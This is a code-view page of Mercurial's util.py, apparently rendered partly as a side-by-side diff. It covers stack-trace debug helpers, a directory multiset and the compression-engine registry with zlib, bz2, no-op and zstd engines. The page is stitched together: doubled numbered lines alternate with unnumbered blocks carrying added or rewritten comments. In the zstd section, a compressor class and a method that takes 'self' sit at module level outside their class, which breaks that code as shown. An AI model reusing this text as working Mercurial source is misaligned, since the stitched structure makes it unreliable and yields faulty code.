3047 def __call__(self, *args):
3048 self._hooks.sort(key=lambda x: x[0])
3048 self._hooks.sort(key=lambda x: x[0])
3049 results = []
3049 results = []
3050 for source, hook in self._hooks:
3050 for source, hook in self._hooks:
3051 results.append(hook(*args))
3051 results.append(hook(*args))
3052 return results
3052 return results
3053
3053
3054 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3054 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3055 '''Yields lines for a nicely formatted stacktrace.
3055 '''Yields lines for a nicely formatted stacktrace.
3056 Skips the 'skip' last entries, then return the last 'depth' entries.
3056 Skips the 'skip' last entries, then return the last 'depth' entries.
3057 Each file+linenumber is formatted according to fileline.
3057 Each file+linenumber is formatted according to fileline.
3058 Each line is formatted according to line.
3058 Each line is formatted according to line.
3059 If line is None, it yields:
3059 If line is None, it yields:
3060 length of longest filepath+line number,
3060 length of longest filepath+line number,
3061 filepath+linenumber,
3061 filepath+linenumber,
3062 function
3062 function
3063
3063
3064 Not be used in production code but very convenient while developing.
3064 Not be used in production code but very convenient while developing.
3065 '''
3065 '''
3066 entries = [(fileline % (fn, ln), func)
3066 entries = [(fileline % (fn, ln), func)
3067 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3067 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3068 ][-depth:]
3068 ][-depth:]
3069 if entries:
3069 if entries:
3070 fnmax = max(len(entry[0]) for entry in entries)
3070 fnmax = max(len(entry[0]) for entry in entries)
3071 for fnln, func in entries:
3071 for fnln, func in entries:
3072 if line is None:
3072 if line is None:
3073 yield (fnmax, fnln, func)
3073 yield (fnmax, fnln, func)
3074 else:
3074 else:
3075 yield line % (fnmax, fnln, func)
3075 yield line % (fnmax, fnln, func)
3076
3076
3077 def debugstacktrace(msg='stacktrace', skip=0,
3077 def debugstacktrace(msg='stacktrace', skip=0,
3078 f=stderr, otherf=stdout, depth=0):
3078 f=stderr, otherf=stdout, depth=0):
3079 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3079 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3080 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3080 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3081 By default it will flush stdout first.
3081 By default it will flush stdout first.
3082 It can be used everywhere and intentionally does not require an ui object.
3082 It can be used everywhere and intentionally does not require an ui object.
3083 Not be used in production code but very convenient while developing.
3083 Not be used in production code but very convenient while developing.
3084 '''
3084 '''
3085 if otherf:
3085 if otherf:
3086 otherf.flush()
3086 otherf.flush()
3087 f.write('%s at:\n' % msg.rstrip())
3087 f.write('%s at:\n' % msg.rstrip())
3088 for line in getstackframes(skip + 1, depth=depth):
3088 for line in getstackframes(skip + 1, depth=depth):
3089 f.write(line)
3089 f.write(line)
3090 f.flush()
3090 f.flush()
3091
3091
3092 class dirs(object):
3092 class dirs(object):
3093 '''a multiset of directory names from a dirstate or manifest'''
3093 '''a multiset of directory names from a dirstate or manifest'''
3094
3094
3095 def __init__(self, map, skip=None):
3095 def __init__(self, map, skip=None):
3096 self._dirs = {}
3096 self._dirs = {}
3097 addpath = self.addpath
3097 addpath = self.addpath
3098 if safehasattr(map, 'iteritems') and skip is not None:
3098 if safehasattr(map, 'iteritems') and skip is not None:
3099 for f, s in map.iteritems():
3099 for f, s in map.iteritems():
3100 if s[0] != skip:
3100 if s[0] != skip:
3101 addpath(f)
3101 addpath(f)
3102 else:
3102 else:
3103 for f in map:
3103 for f in map:
3104 addpath(f)
3104 addpath(f)
3105
3105
3106 def addpath(self, path):
3106 def addpath(self, path):
3107 dirs = self._dirs
3107 dirs = self._dirs
3108 for base in finddirs(path):
3108 for base in finddirs(path):
3109 if base in dirs:
3109 if base in dirs:
3110 dirs[base] += 1
3110 dirs[base] += 1
3111 return
3111 return
3112 dirs[base] = 1
3112 dirs[base] = 1
3113
3113
3114 def delpath(self, path):
3114 def delpath(self, path):
3115 dirs = self._dirs
3115 dirs = self._dirs
3116 for base in finddirs(path):
3116 for base in finddirs(path):
3117 if dirs[base] > 1:
3117 if dirs[base] > 1:
3118 dirs[base] -= 1
3118 dirs[base] -= 1
3119 return
3119 return
3120 del dirs[base]
3120 del dirs[base]
3121
3121
3122 def __iter__(self):
3122 def __iter__(self):
3123 return iter(self._dirs)
3123 return iter(self._dirs)
3124
3124
3125 def __contains__(self, d):
3125 def __contains__(self, d):
3126 return d in self._dirs
3126 return d in self._dirs
3127
3127
3128 if safehasattr(parsers, 'dirs'):
3128 if safehasattr(parsers, 'dirs'):
3129 dirs = parsers.dirs
3129 dirs = parsers.dirs
3130
3130
3131 def finddirs(path):
3131 def finddirs(path):
3132 pos = path.rfind('/')
3132 pos = path.rfind('/')
3133 while pos != -1:
3133 while pos != -1:
3134 yield path[:pos]
3134 yield path[:pos]
3135 pos = path.rfind('/', 0, pos)
3135 pos = path.rfind('/', 0, pos)
3136
3136
3137 # compression code
3137 # compression code
3138
3138
3139 SERVERROLE = 'server'
3139 SERVERROLE = 'server'
3140 CLIENTROLE = 'client'
3140 CLIENTROLE = 'client'
3141
3141
3142 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3142 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3143 (u'name', u'serverpriority',
3143 (u'name', u'serverpriority',
3144 u'clientpriority'))
3144 u'clientpriority'))
3145
3145
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to compressionengine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        """Return the engine registered under ``key`` (KeyError if absent)."""
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        """Iterate over the names of all registered engines."""
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Aborts if the engine name, bundle name/type, wire protocol type or
        revlog header collides with a previously registered engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        # User-facing bundle spec names that have a registered engine.
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        # Internal bundle identifiers that have a registered engine.
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        # sorted() already returns a new list; the previous list(sorted(...))
        # wrapper was redundant.
        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain the engine registered for a wire protocol identifier.

        Will raise KeyError if ``wiretype`` isn't registered. Will abort
        if the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
3301
3301
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3418
3418
class _zlibengine(compressionengine):
    # zlib/DEFLATE support: bundles ('gzip'/'GZ'), the wire protocol, and
    # revlogs (header 'x' -- the first byte of a default-settings zlib
    # stream).
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        # Level -1 lets zlib choose its default compression level.
        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Very small inputs are presumed not worth compressing (zlib
            # framing overhead would dominate) -- the 44-byte cutoff is a
            # heuristic.
            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                # Only use the compressed form if it is actually smaller.
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    # Feed the input in 1 MiB slices.
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                # Surface zlib failures as RevlogError so revlog callers can
                # treat corrupt data uniformly.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        # opts is accepted for interface compatibility; zlib takes no
        # per-compressor options here.
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3505
3505
class _bz2engine(compressionengine):
    # bzip2 support: bundles ('bzip2'/'BZ') and, nominally, the wire
    # protocol (never advertised by default -- see wireprotosupport).
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # Level 9 (maximum compression) is also bz2's documented default.
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer internally and emit nothing; skip
            # empty results rather than yielding empty chunks.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3548
3548
class _truncatedbz2engine(compressionengine):
    # Decompression-only engine for bz2 streams whose leading 'BZ' magic
    # has been stripped. Registered only under the internal '_truncatedBZ'
    # bundle type (the external bundle name is None), so users cannot
    # select it directly.
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
3569
3569
class _noopengine(compressionengine):
    # Pass-through "compression": data is transferred unmodified.
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # opts is accepted for interface compatibility; it is ignored.
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Never compresses; returning None tells the revlog to store
            # the raw data.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3604
3604
3605 class _zstdengine(compressionengine):
3605 class _zstdengine(compressionengine):
3606 def name(self):
3606 def name(self):
3607 return 'zstd'
3607 return 'zstd'
3608
3608
3609 @propertycache
3609 @propertycache
3610 def _module(self):
3610 def _module(self):
3611 # Not all installs have the zstd module available. So defer importing
3611 # Not all installs have the zstd module available. So defer importing
3612 # until first access.
3612 # until first access.
3613 try:
3613 try:
3614 from . import zstd
3614 from . import zstd
3615 # Force delayed import.
3615 # Force delayed import.
3616 zstd.__version__
3616 zstd.__version__
3617 return zstd
3617 return zstd
3618 except ImportError:
3618 except ImportError:
3619 return None
3619 return None
3620
3620
3621 def available(self):
3621 def available(self):
3622 return bool(self._module)
3622 return bool(self._module)
3623
3623
3624 def bundletype(self):
3624 def bundletype(self):
3625 """A modern compression algorithm that is fast and highly flexible.
3625 """A modern compression algorithm that is fast and highly flexible.
3626
3626
3627 Only supported by Mercurial 4.1 and newer clients.
3627 Only supported by Mercurial 4.1 and newer clients.
3628
3628
3629 With the default settings, zstd compression is both faster and yields
3629 With the default settings, zstd compression is both faster and yields
3630 better compression than ``gzip``. It also frequently yields better
3630 better compression than ``gzip``. It also frequently yields better
3631 compression than ``bzip2`` while operating at much higher speeds.
3631 compression than ``bzip2`` while operating at much higher speeds.
3632
3632
3633 If this engine is available and backwards compatibility is not a
3633 If this engine is available and backwards compatibility is not a
3634 concern, it is likely the best available engine.
3634 concern, it is likely the best available engine.
3635 """
3635 """
3636 return 'zstd', 'ZS'
3636 return 'zstd', 'ZS'
3637
3637
3638 def wireprotosupport(self):
3638 def wireprotosupport(self):
3639 return compewireprotosupport('zstd', 50, 50)
3639 return compewireprotosupport('zstd', 50, 50)
3640
3640
3641 def revlogheader(self):
3641 def revlogheader(self):
3642 return '\x28'
3642 return '\x28'
3643
3643
3644 def compressstream(self, it, opts=None):
3644 def compressstream(self, it, opts=None):
3645 opts = opts or {}
3645 opts = opts or {}
3646 # zstd level 3 is almost always significantly faster than zlib
3646 # zstd level 3 is almost always significantly faster than zlib
3647 # while providing no worse compression. It strikes a good balance
3647 # while providing no worse compression. It strikes a good balance
3648 # between speed and compression.
3648 # between speed and compression.
3649 level = opts.get('level', 3)
3649 level = opts.get('level', 3)
3650
3650
3651 zstd = self._module
3651 zstd = self._module
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3653 for chunk in it:
3653 for chunk in it:
3654 data = z.compress(chunk)
3654 data = z.compress(chunk)
3655 if data:
3655 if data:
3656 yield data
3656 yield data
3657
3657
3658 yield z.flush()
3658 yield z.flush()
3659
3659
3660 def decompressorreader(self, fh):
3660 def decompressorreader(self, fh):
3661 zstd = self._module
3661 zstd = self._module
3662 dctx = zstd.ZstdDecompressor()
3662 dctx = zstd.ZstdDecompressor()
3663 return chunkbuffer(dctx.read_from(fh))
3663 return chunkbuffer(dctx.read_from(fh))
3664
3664
class zstdrevlogcompressor(object):
    """Reusable zstd (de)compressor for revlog chunks.

    ``zstd`` is the python-zstandard module; ``level`` is the
    compression level (default 3).
    """

    def __init__(self, zstd, level=3):
        # Writing the content size adds a few bytes to the output, but
        # it lets decompression pre-allocate a buffer for the result,
        # making it more optimal.
        self._cctx = zstd.ZstdCompressor(level=level,
                                         write_content_size=True)
        self._dctx = zstd.ZstdDecompressor()
        self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
        self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

    def compress(self, data):
        """Return compressed ``data``, or None when storing it raw is better.

        Empty input is the caller's responsibility to filter out.
        """
        insize = len(data)
        assert insize > 0

        # Very small inputs are not worth the attempt.
        if insize < 50:
            return None

        if insize <= 1000000:
            # One-shot compression for typical sizes; keep the result
            # only if it actually saved space.
            compressed = self._cctx.compress(data)
            return compressed if len(compressed) < insize else None

        # Stream very large inputs through a compressobj in
        # recommended-size slices.
        compobj = self._cctx.compressobj()
        pieces = []
        for start in range(0, insize, self._compinsize):
            out = compobj.compress(data[start:start + self._compinsize])
            if out:
                pieces.append(out)
        pieces.append(compobj.flush())

        if sum(map(len, pieces)) < insize:
            return ''.join(pieces)
        return None

    def decompress(self, data):
        """Return the decompressed form of ``data``.

        Raises error.RevlogError if decoding fails.
        """
        insize = len(data)

        try:
            # A streaming decompressobj was measured to be faster than
            # the other decompression interfaces.
            dobj = self._dctx.decompressobj()
            pieces = []
            for start in range(0, insize, self._decompinsize):
                out = dobj.decompress(data[start:start + self._decompinsize])
                if out:
                    pieces.append(out)
            # The frame is fully consumed by the loop, so there is no
            # finish() step.
            return ''.join(pieces)
        except Exception as e:
            raise error.RevlogError(_('revlog decompress error: %s') %
                                    str(e))
3726
3726
def revlogcompressor(self, opts=None):
    """Return a reusable revlog compressor honoring ``opts['level']``."""
    level = (opts or {}).get('level', 3)
    return self.zstdrevlogcompressor(self._module, level=level)
3731
3731
# Register the zstd engine with the shared compression-engine registry
# so it can be looked up by name alongside the other engines.
compengines.register(_zstdengine())
3733
3733
def bundlecompressiontopics():
    """Return a dict of available bundle compressions for use in help.

    help.makeitemsdocs() expects a mapping of names to objects exposing
    a ``__doc__`` attribute, so each entry is a small carrier object
    holding the formatted docstring.
    """
    # Dummy type used to hold the reformatted docstring rather than
    # mutating the engine's own bundletype method.
    class docobject(object):
        pass

    topics = {}
    for name in compengines:
        engine = compengines[name]
        if not engine.available():
            continue

        btinfo = engine.bundletype()
        if not (btinfo and btinfo[0]):
            continue

        btname = btinfo[0]
        carrier = docobject()
        carrier.__doc__ = pycompat.sysstr('``%s``\n    %s') % (
            btname, engine.bundletype.__doc__)
        carrier._origdoc = engine.bundletype.__doc__
        carrier._origfunc = engine.bundletype
        topics[btname] = carrier

    return topics
3765
3765
# Expose the per-bundletype doc carriers at module level.
# NOTE(review): presumably consumed by the i18n string-extraction
# machinery (hence the name) -- confirm against the i18n tooling.
i18nfunctions = bundlecompressiontopics().values()
3767
3767
# Convenient shorthand for sprinkling debug stack traces into code
# during development.
dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now